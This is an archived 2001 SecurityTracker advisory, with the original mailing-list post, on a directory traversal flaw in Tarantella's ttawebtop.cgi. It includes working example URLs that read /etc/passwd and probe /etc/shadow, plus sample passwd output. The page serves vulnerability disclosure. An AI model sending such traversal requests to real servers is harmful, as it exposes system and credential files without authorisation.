SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
About the Archives
Want to learn about the SecurityTracker archives? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Web Server/CGI)  >  Tarantella Vendors:  Tarantella, Inc.
Tarantella Application Web Server Discloses Files on the Server to Remote Users
Date:  Jun 19 2001 02:29 (UTC/GMT)
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.

The vunerability reportedly resides in the ttawebtop.cgi module.

If a remote user issues the following type of example URL, the server will return the world-readable password file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../.. /etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server, it will return a 'file missing' error message, as shown below:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

The vendor has reportedly been notified.
Impact:  A remote user can obtain world-readable files located anywhere from the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.tarantella.com/ (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Caldera), Linux (Red Hat), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (SCO), UNIX (Solaris - SunOS), Unix (Tru64)
Reported By:  KF <dotslash@snosoft.com>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 19 2001 (Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users   (Mike McEwen <mikemc@tarantella.com>)
The vendor announces that they have fixed the problem. The vendor reports on which versions were vulnerable.


 Source Message Contents
Date:  Mon, 18 Jun 2001 13:18:08 -0400
From:  KF <dotslash@snosoft.com>
Subject:  SCO Tarantella Remote file read via ttawebtop.cgi

 

SCO has been notified of this issue. 


-------- Original Message --------
Subject: SCO Tarantella Remote file read via ttawebtop.cgi
Date: Mon, 18 Jun 2001 13:06:41 -0400
From: KF <dotslash@snosoft.com>
To: recon@snosoft.com


http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../
../../../etc/passwd

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/
...


No perms to shadow... 

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../
../../../etc/shadow

 
File missing

The following file could not be found:

                                              
/tarantella/../../../../../../../../../../../../../../../etc/shadow

 Please give this information to a Tarantella Administrator.

-KF


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2001, SecurityGlobal.net LLC